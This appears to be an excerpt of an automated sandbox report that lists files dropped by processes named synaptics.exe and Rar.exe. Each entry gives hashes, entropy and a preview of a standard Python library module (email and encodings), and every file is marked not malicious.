                                                                                                                                                                                                                                  Preview:o........'-d.........................@...sJ...d.Z.g.d...Z.d.d.l.Z.d.d.l.m.Z...d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.).z1Various types of useful iterators and generators.)...body_line_iterator..typed_subpart_iterator..walk.....N)...StringIOc....................c...s4.....|.V...|.....r.|.....D.].}.|.....E.d.H...q.d.S.d.S.).z.Walk over the message tree, yielding each subpart... The walk is performed in depth-first order. This method is a. generator.. N)...is_multipart..get_payloadr....)...self..subpart..r.....1C:\Users\Public\M20EKMMEH2\lib\email\iterators.pyr........s..................r....Fc....................c...s8.....|.....D.].}.|.j.|.d...}.t.|.t...r.t.|...E.d.H...q.d.S.).z.Iterate over the parts, returning string payloads line-by-line... Optional decode (default False) is passed through to .get_payload().. )...decodeN).r....r......isinstance..strr....)...msgr....r......payloadr....r....r....r...."...s..................r......textc....................c...s:.....|
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):37815
                                                                                                                                                                                                                                  Entropy (8bit):5.296198903345635
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:z3vKre029TBAXUyI2UBNqLYn1cT93o29Aev5Oi/GTs:DvN029TSUr26N+OaT9YmAOSs
                                                                                                                                                                                                                                  MD5:50C2C9B2B4F6C45EF57599A577BDAD1E
                                                                                                                                                                                                                                  SHA1:7735797AB935432779EFAED072626C96B6C16D13
                                                                                                                                                                                                                                  SHA-256:DF608A6AB9B9E599CE45C00BF1413B5EA363A70B9A90617487D1D6DA9396603A
                                                                                                                                                                                                                                  SHA-512:F6F9BCFFD811F664F084CF7C6B3C81AD65F8484F3570FC33AE9A9465DA200F3568C82C782CE874D87569177E5FE26F2A0D8BFE76F3B98949862A43E8465440EB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-di........................@...s....d.Z.d.d.g.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.Z.d.Z.e...d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).z8Basic message object for the email package object model...Message..EmailMessage.....N)...BytesIO..StringIO)...utils)...errors)...Policy..compat32....charset)...decode_bz.; z.[ \(\)<>@,;:\\"/\[\]\?=]c....................C...s4...t.|.....d...\.}.}.}.|.s.|.....d.f.S.|.....|.....f.S.).N..;)...str..partition..strip)...param..a..sep..b..r...../C:\Users\Public\M20EKMMEH2\lib\email\message.py.._splitparam....s............r....Tc....................C...s....|.d.u.r^t.|...d.k.r^t.|.t...r&|.d.7.}.t...|.d...|.d...|.d.....}.d.|.|.f...S.z.|...d.....W.n...t.yG......|.d.7.}.t...|.d.d...}.d.|.|.f.....Y.S.w.|.sOt...|...rXd.|.t...|...f...S.d.|.|.f...S.|.S.).a~...Convenience function to format and return a key=value pair... This will quo
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5684
                                                                                                                                                                                                                                  Entropy (8bit):4.921512313684053
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:l/3XAtU7ue6RPlVEnTSi7sebc9++etT2FZXUVt3NzMb:pgtU7+RPETSi7sebc9M2LXUVt3NzMb
                                                                                                                                                                                                                                  MD5:DBCFFFD37DABF422AA931348E419E862
                                                                                                                                                                                                                                  SHA1:9C75F77DB32BD946445E204DAF3BAC56E8DC82CE
                                                                                                                                                                                                                                  SHA-256:42D20C7DF0AF6D04DE200F9AB242EA2E1EB83A63B6E0AF0C0299A4B10DEEE37B
                                                                                                                                                                                                                                  SHA-512:9C1091E09FAC2844602DC1F69634E579A694CF9061A7D80A2A13BD04B42C854511264EFF4C4549319AEAAF06789A9FA61C60170A2A85A6787F23DCD27A652387
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d4........................@...sx...d.Z.g.d...Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.d.S.).z-A parser of RFC 2822 and MIME email messages.)...Parser..HeaderParser..BytesParser..BytesHeaderParser..FeedParser..BytesFeedParser.....)...StringIO..TextIOWrapper).r....r....)...compat32c....................@...s0...e.Z.d.Z.d.e.d...d.d...Z.d.d.d...Z.d.d.d...Z.d.S.).r....N....policyc....................C...s....|.|._.|.|._.d.S.).a....Parser of RFC 2822 and MIME email messages... Creates an in-memory object tree representing the email message, which. can then be manipulated and turned over to a Generator to return the. textual representation of the message... The string must be formatted as a block of RFC 2822 headers and header. continuation lines, optionally preceded by a `Unix-from' header. The. header block is terminated either by the end of the string or by a. blank
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7634
                                                                                                                                                                                                                                  Entropy (8bit):5.50712611139407
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:eLJLyjCY2rlgeRk/SEe4iIf3HOxK4RVZtpes7tOcQekFUyq2n1/ugYu9eYBAd7z4:yJYUGQ2SEr27RlpsyyFhugYQeYBk8B9
                                                                                                                                                                                                                                  MD5:251E90F5899356853C473DE37BC5D91C
                                                                                                                                                                                                                                  SHA1:2CA10B7AA1F1E5C5E53C8BC19847A32420C3E3F7
                                                                                                                                                                                                                                  SHA-256:D89A63F6C8D2B19FBC504EB2F4C0D324F84C6AE95E7143EC426B416A92E91F99
                                                                                                                                                                                                                                  SHA-512:8756F9DABD7EB0956F76C3FD23928DC7D220FF7554E43759D1392966920631ACCC23DDB02C7B579F9E6ECA47E4F1BF15CCF6A790705167C2094C03BC21F5CCEA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.'.......................@...sF...d.Z.g.d...Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.Z.d.Z.d.Z.d.d...e.d...D...Z.e.d.d.....Z.e.d.d.....Z.d.e...d.....e...d.....D.].Z.e.e...e.e.<.q;d.e.e.d...<.d.D.].Z.e.e...e.e.<.qLd.d...Z.d.d...Z.d.d...Z.d.d...Z.d+d.d...Z.d.d...Z.d.d...Z.d,d.d ..Z.e.d.d.....Z.d!D.].Z.e.e...e.e.<.q.d"e.f.d#d$..Z.e.f.d%d&..Z.e.Z.e.Z.d'd(..Z.d)d*..Z d.S.)-aF...Quoted-printable content transfer encoding per RFCs 2045-2047...This module handles the content transfer encoding method defined in RFC 2045.to encode US ASCII-like 8-bit data called `quoted-printable'. It is used to.safely encode text that is in a character set similar to the 7-bit US ASCII.character set, but that includes some 8-bit characters that are normally not.allowed in email bodies or headers...Quoted-printable is very space-inefficient for encoding binary files; use the.email.base64mime module for that instead...This module provides an interface to encode and decode both headers and bodies.with quoted-p
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9697
                                                                                                                                                                                                                                  Entropy (8bit):5.526810916927129
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:6bd41opYU1b0vS5Tc8PNMw1TBrUEPUcXDu4cGGZscLPtCSStw3TG/3W4b/o:upyv+FSwNBrUmbXDu4QRPzGyGn/o
                                                                                                                                                                                                                                  MD5:E9086B6752060E87232DD5E5611EE7CC
                                                                                                                                                                                                                                  SHA1:3017476963B50D1CC5D3F76E4D8079542E2996CA
                                                                                                                                                                                                                                  SHA-256:60FB46A6E7287259B1A533FBF42CD4ABDC07C4062515E7B60FD47F0D789AA0FC
                                                                                                                                                                                                                                  SHA-512:02024037D85C99AF27475BBA9CF488944B22957832A62AE34904FAFAA521BC87B671C84C4F5366ACD7439D5EF4422BAB47BAEFAFFB9A103529D4BA97DDB33548
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.5.......................@...sT...d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z.e...d...Z.e...d...Z.d.d...Z.d.d...Z.d5d.d...Z.d.d...Z.d.d...Z d6d.d...Z!d7d.d...Z"d8d.d ..Z#d!d"..Z$d#d$..Z%d%d&..Z&d'd(..Z'd8d)d*..Z(e...d+e.j)..Z*d,d-..Z+.../d9d0d1..Z,d:d3d4..Z-d.S.);z.Miscellaneous utilities.)...collapse_rfc2231_value..decode_params..decode_rfc2231..encode_rfc2231..formataddr..formatdate..format_datetime..getaddresses..make_msgid..mktime_tz..parseaddr..parsedate..parsedate_tz..parsedate_to_datetime..unquote.....N)...quote)...AddressList).r....).r....r......_parsedate_tz)...Charsetz., ..z.....'z.[][\\()<>@,:;".]z.[\\"]c....................C...s$...z.|.......W.d.S...t.y.......Y.d.S.w.).z8Return True if s contains surrogate-escaped binary data.FT)...encode..UnicodeEncodeError)...s..r.....-C:\Users\Public\M20EKMMEH2\lib\email\utils.py.._has_surrogates3...s...............
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5790
                                                                                                                                                                                                                                  Entropy (8bit):4.479931891852748
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:VHdpCpI/qD2Q0pU8F6fdaLcbkCN/yRMffWL1+rpOc6i7AYS2kEJlQ6w1AD4:XpCpIPpHEN/yYi1+NOc6IAYS2kEXQ6wr
                                                                                                                                                                                                                                  MD5:7E6A62EF920CCBBC78ACC236FDF027B5
                                                                                                                                                                                                                                  SHA1:816AFC9EA3C9943E6A7E2FAE6351530C2956F349
                                                                                                                                                                                                                                  SHA-256:93CFD89699B7F800D6CCFB93266DA4DB6298BD73887956148D1345D5CA6742A9
                                                                                                                                                                                                                                  SHA-512:C883B506AACD94863A0DD8C890CBF7D6B1E493D1A9AF9CDF912C047B1CA98691CFD910887961DD94825841B0FE9DADD3AB4E7866E26E10BFBBAE1A2714A8F983
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Standard "encodings" Package.... Standard Python encoding modules are stored in this package.. directory..... Codec modules must have names corresponding to normalized encoding.. names as defined in the normalize_encoding() function below, e.g... 'utf-8' must be implemented by the module 'utf_8.py'..... Each codec module must export the following interface:.... * getregentry() -> codecs.CodecInfo object.. The getregentry() API must return a CodecInfo object with encoder, decoder,.. incrementalencoder, incrementaldecoder, streamwriter and streamreader.. attributes which adhere to the Python Codec Interface Standard..... In addition, a module may optionally also define the following.. APIs which are then used by the package's codec search function:.... * getaliases() -> sequence of encoding name strings to use as aliases.... Alias names returned by getaliases() must be normalized encoding.. names as defined by normalize_encoding().....Writ
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3886
                                                                                                                                                                                                                                  Entropy (8bit):5.53529365376628
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:wXLHIYGspF3e06Q0YhQHUjHz/6k1XYLKM/n5K7wlNUNYfq3JZ1Y:wXEYLpFkYUU7XYLf5c6+X1Y
                                                                                                                                                                                                                                  MD5:8AD5E4A14646029D8BA076E3C73F94C7
                                                                                                                                                                                                                                  SHA1:52FF97077DC1B154B610389CDD49DBE477B0D484
                                                                                                                                                                                                                                  SHA-256:DE0517316828913B3FD9904E74CDDE8595E2D4426A571B0D805C132736C31B1D
                                                                                                                                                                                                                                  SHA-512:EE9EE21C61A0C6A6802B8180870CC75F8E261B955271D94D86C0CDF5525B2581B08C5F9902714B7B79EABEF3A2D48FD57B5426AC7A3C26C39A57156BFCC22AF1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...i.Z.d.Z.d.g.Z.e.j.Z.G.d.d...d.e.e...Z.d.d...Z.d.d...Z.e...e.....e.j.d.k.r@d.d...Z.e...e.....d.S.d.S.).a2... Standard "encodings" Package.. Standard Python encoding modules are stored in this package. directory... Codec modules must have names corresponding to normalized encoding. names as defined in the normalize_encoding() function below, e.g.. 'utf-8' must be implemented by the module 'utf_8.py'... Each codec module must export the following interface:.. * getregentry() -> codecs.CodecInfo object. The getregentry() API must return a CodecInfo object with encoder, decoder,. incrementalencoder, incrementaldecoder, streamwriter and streamreader. attributes which adhere to the Python Codec Interface Standard... In addition, a module may optionally also define the following. APIs which are then used by the package's codec search function:.. * getaliases() -> sequence of enc
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10932
                                                                                                                                                                                                                                  Entropy (8bit):5.843340781913276
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:wX2eNkBweGfGkueK4+I2Zyu6UtXqxUZH1iJzxOkq4bpehh3qkyR0N:wXG0bueBI6fzx9IX6Ri
                                                                                                                                                                                                                                  MD5:67AAD5A266EE3D0C2983FB9366BB3220
                                                                                                                                                                                                                                  SHA1:4BE9644FF721A2F21864AEB20A5FF706DAA18764
                                                                                                                                                                                                                                  SHA-256:5A3E17BDF3D60CBB608A02833FA90B226214BC6C259F7C1733C62908F6C194E8
                                                                                                                                                                                                                                  SHA-512:DACEC2B1A1AAC7824463279D50A1CA84E6AA2C9519B17AE711BD50A6AAC903C7CAC771A7C28610C04D66E98A9F0BB473F6C67034ACA755D5305A55E87189B812
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dd?.......................@...s....d.Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d...d!d...d"d#..d$d#..d%d#..d&d'..d(d'..d)d'..d*d'....i.d+d,..d-d,..d.d/..d0d/..d1d2..d3d2..d4d5..d6d5..d7d8..d9d8..d:d;..d<d;..d=d>..d?d>..d@dA..dBdA..dCdD....i.dEdD..dFdG..dHdG..dIdJ..dKdJ..dLdJ..dMdN..dOdN..dPdN..dQdN..dRdS..dTdS..dUdS..dVdW..dXdW..dYdW..dZdW....i.d[dW..d\d]..d^d]..d_d]..d`da..dbda..dcda..ddde..dfde..dgde..dhdi..djdi..dkdi..dldm..dndm..dodm..dpdq....i.drdq..dsdq..dtdu..dvdu..dwdu..dxdy..dzdy..d{dy..d|dy..d}d~..d.d~..d.d~..d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d..d.d..d.d..d.d..d.d..
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2388
                                                                                                                                                                                                                                  Entropy (8bit):5.4362404290272215
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:G8HYqr1EKznGxtCOJxDvTk3J9rBDfLTTLTDfLTTp6HbDHT:G8HY0EiWtZjr+Jldf33Pf396nz
                                                                                                                                                                                                                                  MD5:A1790D1C8EB211D53D7CF8C2BC364603
                                                                                                                                                                                                                                  SHA1:B8C8F441599344717FAE10EC9BC07F9EF828C9D8
                                                                                                                                                                                                                                  SHA-256:4A64A8912E8EBCFCAA06D4851250A4B7762639552DAC238076E056144B6B879B
                                                                                                                                                                                                                                  SHA-512:CD8FA500C7DAFC0962A61C95601E1B89B88B38DC2F00775E5ADD552ED7F31C3BC958A4CEB24A8FFAF038C1B5682A8D8936571373F09B88E61D18593D348BD6AF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.5.......................@...s....d.Z.d.d.l.Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.e.j...Z.G.d.d...d.e.e.j...Z.d.d...Z.d.Z.e...e...Z.d.S.).zv Python Character Mapping Codec cp1252 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1252.TXT' with gencodec.py........Nc....................@...s ...e.Z.d.Z.d.d.d...Z.d.d.d...Z.d.S.)...Codec..strictc....................C........t...|.|.t...S...N)...codecs..charmap_encode..encoding_table....self..input..errors..r.....2C:\Users\Public\M20EKMMEH2\lib\encodings\cp1252.py..encode...........z.Codec.encodec....................C...r....r....).r......charmap_decode..decoding_tabler....r....r....r......decode....r....z.Codec.decodeN).r....)...__name__..__module__..__qualname__r....r....r....r....r....r....r........s..........r....c....................@........e.Z.d.Z.d.d.d...Z.d.S.)...IncrementalEncoderFc....................C........t...|.|.j.t...d...S...Nr....).r....r....r....r......r....r......finalr....r....r
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5610
                                                                                                                                                                                                                                  Entropy (8bit):5.232623018536189
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:iD5aoZ0Mq9d9y50Om16wQNWLT1arA5fCAFK5n4NcJwp7ogXdB:ysoZ0n9d92Dm1rQNWL8s5aZocJwpJNB
                                                                                                                                                                                                                                  MD5:CFFAEBDFC0474227B538F187786085AB
                                                                                                                                                                                                                                  SHA1:1A25536CF633BBA08FC7741646432621B709F19B
                                                                                                                                                                                                                                  SHA-256:D807DF53CE0BB4DF3AE8F3A206B6E79E17552197FE39B906B1557F9A597FAE94
                                                                                                                                                                                                                                  SHA-512:90C8C0508D14437719EC93ED883CBAC5615E93DC2E005D887A3D917358297D175AEED6129AFDD15B04CCDDF8509133A2452AD414E04317110A991BE276536917
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.$.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e...d...Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.e.j...Z.G.d.d...d.e.e.j...Z.d.d...Z.d.S.)......N)...ucd_3_2_0u....[....]s....xn--z.xn--c....................C...s....g.}.|.D.].}.t...|...r.q.|...t...|.......q.d...|...}.t...d.|...}.|.D.]5}.t...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...rWt.d.|.......q"d.d...|.D...}.t.|...r|t.d.d...|.D.....rpt.d.....|.d...rx|.d...s|t.d.....|.S.).N....NFKCz.Invalid character %rc....................S...s....g.|.].}.t...|.....q.S...)...stringprepZ.in_table_d1.....0..xr....r.....0C:\Users\Public\M20EKMMEH2\lib\encodings\idna.py..<listcomp>)...s......z.nameprep.<locals>.<listcomp>c....................s...s......|.].}.t...|...V...q.d.S.).N).r....Z.in_table_d2r....r....r....r......<genexpr>1...s........z.nameprep.<locals>.<genexpr>z.Violation of BIDI requirement 2r.........z.Vi
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5610
                                                                                                                                                                                                                                  Entropy (8bit):5.232623018536189
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:iD5aoZ0Mq9d9y50Om16wQNWLT1arA5fCAFK5n4NcJwp7ogXdB:ysoZ0n9d92Dm1rQNWL8s5aZocJwpJNB
                                                                                                                                                                                                                                  MD5:CFFAEBDFC0474227B538F187786085AB
                                                                                                                                                                                                                                  SHA1:1A25536CF633BBA08FC7741646432621B709F19B
                                                                                                                                                                                                                                  SHA-256:D807DF53CE0BB4DF3AE8F3A206B6E79E17552197FE39B906B1557F9A597FAE94
                                                                                                                                                                                                                                  SHA-512:90C8C0508D14437719EC93ED883CBAC5615E93DC2E005D887A3D917358297D175AEED6129AFDD15B04CCDDF8509133A2452AD414E04317110A991BE276536917
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.$.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e...d...Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.e.j...Z.G.d.d...d.e.e.j...Z.d.d...Z.d.S.)......N)...ucd_3_2_0u....[....]s....xn--z.xn--c....................C...s....g.}.|.D.].}.t...|...r.q.|...t...|.......q.d...|...}.t...d.|...}.|.D.]5}.t...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...rWt.d.|.......q"d.d...|.D...}.t.|...r|t.d.d...|.D.....rpt.d.....|.d...rx|.d...s|t.d.....|.S.).N....NFKCz.Invalid character %rc....................S...s....g.|.].}.t...|.....q.S...)...stringprepZ.in_table_d1.....0..xr....r.....0C:\Users\Public\M20EKMMEH2\lib\encodings\idna.py..<listcomp>)...s......z.nameprep.<locals>.<listcomp>c....................s...s......|.].}.t...|...V...q.d.S.).N).r....Z.in_table_d2r....r....r....r......<genexpr>1...s........z.nameprep.<locals>.<genexpr>z.Violation of BIDI requirement 2r.........z.Vi
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1608
                                                                                                                                                                                                                                  Entropy (8bit):4.726382272916581
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:ZVtus1pip5nHUrYPyaGcLXaLOsJkLBBn1U:ZbuWkHUPNcLXaasmP1U
                                                                                                                                                                                                                                  MD5:D7D2BDE69388B39EE88C3B95E32AE1CB
                                                                                                                                                                                                                                  SHA1:B8869EC48CF63D8E10B9B65598119FC0FD223BA7
                                                                                                                                                                                                                                  SHA-256:060268CA2E8E62120D31E2B15BDBB98565DEB1F84FB04850BC57B31884A93D80
                                                                                                                                                                                                                                  SHA-512:C464E8D49BF5C7083C16C610A9CDD781D0DAFF1CB7B3260D901DE8C49ED5FCC041A69ADE9505E598050273673A52031A2786995550770B2496454A84041E51C8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...sp...d.Z.d.d.l.Z.e.j.Z.d.d.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.d.d...Z.d.S.).z. Python 'utf-8' Codec...Written by Marc-Andre Lemburg (mal@lemburg.com)...(c) Copyright CNRI, All Rights Reserved. NO WARRANTY........N..strictc....................C...s....t...|.|.d...S.).NT)...codecs..utf_8_decode)...input..errors..r.....1C:\Users\Public\M20EKMMEH2\lib\encodings\utf_8.py..decode....s......r....c....................@...s....e.Z.d.Z.d.d.d...Z.d.S.)...IncrementalEncoderFc....................C...s....t...|.|.j...d...S.).Nr....).r......utf_8_encoder....)...selfr......finalr....r....r......encode....s......z.IncrementalEncoder.encodeN).F)...__name__..__module__..__qualname__r....r....r....r....r....r........s........r....c....................@........e.Z.d.Z.e.j.Z.d.S.)...IncrementalDecoderN).r....r....r....r....r......_buffer_decoder....r....r....r....r.................r....c....................@...r....)...Strea
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12362
                                                                                                                                                                                                                                  Entropy (8bit):4.601902617990224
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:aHhsuOTDvRqUwGYPJHjA/KT4RltXARfFVV2IC4FcE8bVO4BG2QST/:3TBcWK3cE8bT1QK
                                                                                                                                                                                                                                  MD5:85667B33899EC661331A9CA44CB36DEC
                                                                                                                                                                                                                                  SHA1:E755BF3ACA17896638E62BE91D9C8AFE0A6ED725
                                                                                                                                                                                                                                  SHA-256:AE6E956B42CF3AE32E988833772FC040F8393DA007048AD2B4E1D621FE6523E7
                                                                                                                                                                                                                                  SHA-512:4D7178C9AC351A644F6062D09FA9C28D569F48ABF1CC4F906C93B8BCCB151FE450E0A9B7A8EF26BD2851A7CE213F27A309F0EA6A2C999A7C5866432DF9E6FBCB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec cp424 generated from 'MAPPINGS/VENDORS/MISC/CP424.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp424',.. encode=Cod
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):35262
                                                                                                                                                                                                                                  Entropy (8bit):4.591583826618043
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:p1LnZkjh4wVdjIVjxAEJHWJn4AVEccqPMy:XqjhJVRKxAEJ2BF6S
                                                                                                                                                                                                                                  MD5:A11E9C869BD055D6C91354FFFEB7644F
                                                                                                                                                                                                                                  SHA1:B008E64C808A86312863C194C621214134B4C432
                                                                                                                                                                                                                                  SHA-256:7B0A9AE2E74D370354CC60CBCFB77AF970364818BE2E2A446187DCCCF9E28ACC
                                                                                                                                                                                                                                  SHA-512:3A628F1BB8D36845074B4FA66A8B91B5F8365C5677CC81AFA5D7DA1313F328E1B409A3C43249C9D62FADC2B71CE9E7CE70CCD3854BA7B8CBB19CFB79B8AD92FE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec cp437 generated from 'VENDORS/MICSFT/PC/CP437.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp437',.. encode=Codec().enc
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13428
                                                                                                                                                                                                                                  Entropy (8bit):4.523115396759222
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:ZHhsuOTDvR7UZkPS9BrG4/RVFIhRNvYkV2H2QB:8TirG4/0RYkgWQB
                                                                                                                                                                                                                                  MD5:BEE7333323D2BCA3262F13C59414EDD3
                                                                                                                                                                                                                                  SHA1:57E74B1BA865C5198C26344B2F6F270350C014B4
                                                                                                                                                                                                                                  SHA-256:A5CAC573ED357CB6C2A672D01696212C25E306936586D94BE0D0130354A4DB6F
